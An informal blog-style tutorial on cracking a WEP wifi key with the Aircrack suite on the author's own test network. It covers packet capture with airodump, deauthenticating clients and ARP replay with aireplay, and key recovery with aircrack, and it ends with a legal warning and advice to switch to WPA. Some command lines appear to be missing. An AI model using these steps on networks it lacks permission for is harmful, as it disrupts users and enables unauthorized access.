Having dealt with faking MAC addresses in a previous article, the Poorhouse heard on the grapevine that it wasn't so difficult to beat the other side of bog-standard wireless network security either; the encryption key.

When a wireless network client talks to an access point (for instance a router) it transmits packets of data. These packets could potentially be intercepted by a nefarious individual sitting nearby by virtue of the fact they are flying through the air for all to see. They could then feasibly see what the network user is up to, or sneakily communicate with their network, use their Internet connection and so on. Therefore wifi networks with a semblance of security use encryption so a passer-by cannot see what is going on with the network or understand any of the packets being transmitted around it. Typically this may be done with "Wired Equivalency Privacy" (WEP), which is often the only option open to users of older or cheaper equipment. The Poorhouse knows for sure that both home users and perhaps more worryingly business users use it regularly.

To participate in a WEP session, you need a key that tells the computer how to encrypt and decrypt the data it is communicating with. Once you have this, you can log on, read network traffic and so on (barring any further access or encrypto-type blocks). So, if you have forgotten your WEP key or are an evil hax0r, how would you get this?

Well it turns out that WEP isn't the most secure of encryption systems. By intercepting enough - and "enough" is a feasible amount to get in the real world - communications (that at this point can't be understood) between a client and an access point, you can gather enough encrypted packets such that the key can be swiftly worked out from them in your own time.

To do this, it is often better to work in Linux rather than for example Windows, because network cards tend to be able to enter more useful modes (especially "monitor" mode where the card can read any packets from any wifi network conversation in range, not just ones on a network it is connected to) using Linux drivers - if you can find one for your card. Potential tools of the trade include the Aircrack suite. The Poorhouse decided to "crack" its own test network to see if it was as relatively easy as the rumours say.

The Aircrack suite contains programs to sniff and record packets as they fly through the air, until you have enough to work out the key from (airodump). If needed, it can inject more packets to speed up the process (aireplay). It also can work out the key from these packets (aircrack). It contains other tools, but the Poorhouse's network was defeated by just these three.

A brief guide to how it was done follows. In this case, imagine that the network's SSID name was NETWORK1 and it was running via a wireless router with a MAC address of 11:22:33:44:55:66 on wifi channel 6. Furthermore there was a legitimate client computer accessing it at the time, with a MAC address of You can remotely find what the relevant MAC addresses, channel and SSID of your target are using the methods mentioned in the faking MAC address article, for instance using software such as Kismet. If you use Kismet, almost all of this info is available by selecting the relevant network in the list and hitting enter. The rest can be got by hitting shift-C to bring up info on the clients accessing that network.

The evil hax0r in question was in a nearby room, playing with Aircrack on a bog standard laptop equipped with a bog standard wifi card.

You want to be working in Linux with say the hostap drivers loaded for your wifi card. The first thing to do was to make the laptop's wifi card enter monitor mode and lock onto the correct channel so that it could intercept packets from networks it was not connected to. The wifi card was known to Linux as wlan0 (to find this out, type "ifconfig". This was done via:

Airodump: Catching packetsThen airodump was started in order to record the packets flying around the network. We need to record lots of packets so make sure you have enough diskspace to cope - the Poorhouse's file reached a little under 200 megabytes.

airodump wlan0 capturefile 11:22:33:44:55:66

where capturefile is the name of the file you want to store the packet information in.

You will now see on screen some information about the access point and any client's accessing it. There will be a count of packets, which should be going up if the network is in use. Internet sources suggest you need 700,000 - 1,000,000 packets to safely crack a 128-bit encrypted WEP key. However the Poorhouse found it was possible to do it in not many more than 400,000. Sit and wait for this count to go up to that sort of level.

Aireplay: Arping onThis could take a fair while (several hours for instance) if the network's not very busy. Why not help it along? Aireplay contains several features that will do that job. Aireplay has an attack mode 0 that deauthenticates all clients from an access point. To the legitimate user of the network, it will appear that the network connection cut out for a moment. Some less stable clients may even crash, be warned. The point of doing this, is when the client computers automatically start to re-authenticate (so they can use the network again), some interesting packets are sent. These are called ARP packets and are involved in the translation of IP addresses given out by the router (such as 124.126.127.178) to specific MAC addresses of the client computer (77:88:99:AA:BB:CC).

Aireplay attack mode 3 will listen out for these packets, and if it finds them it will replay them to the network at a high speed as though it was the client computer. This will then increase the packet count that you are recording in Airodump in a very quick manner. The procedure to do this (sending 10 deauthentication packets) was as follows - ensure Airodump is still running to collect packets:

You should see Aireplay looking for and soon finding and replaying ARP packets at high speed. When this happens, the packet count in Airodump should go up quickly as well. Continue this until you have enough packets to attempt to crack a key with.

Success: the t0p s3cr3t c0De revealed!When you have enough packets, you can stop Airodump and Aireplay. You then need to use Aircrack to work out the key from the collection of packets you have saved.

The n parameter is the length of the key, in this case 128 bit. You can try the various options out (64, 128, 152, 256) if you get no success. The f parameter is a "fudge factor". It defaults to two. The higher the fudge factor, the longer the crack will likely take, but also the more chance it has of finding a key. The Poorhouse found a fudge factor of 3 broke the WEP key in question, but had there been a higher number of packets captured (for instance the recommended 700,000) it probably wouldn't have been needed. Higher fudge factor included, the crack took no more than a handful of minutes.

If all goes well, Aircrack will test various candidate keys based on the packet information gathered with Airdump, and will print out the actual WEP key at the bottom of its output.

With this key, and the ability to fake your MAC, you almost certainly can get into any MAC/WEP security based network to see what they're up to, connect to their computers and use their resources. Or you could just use your neighbour's wireless Internet if you are that desperate. Be warned though that using these techniques to access any networks that you don't have permission to is very naughty, and indeed most probably highly illegal. Don't do it!

Network owners: be therefore aware that MAC and WEP is not good enough security if you're up to anything important. Many modernish systems can do WPA encryption instead of WEP. At present this is a securer system. Nothing is perfect, but it doesn't have the specific weaknesses of WEP, so if you get the chance use that instead. If your equipment can't handle that (many older or cheaper bits of computer can't) then ensure if you do anything that needs mega security over your wifi network you encrypt it in some other, more hardcore, way on your computer before sending the packets to all and sundry.

Thanks to Wirelessdefence, Tom's Networking, Slax and the tools mentioned above for containing the knowledge to guide this mission to successful completion.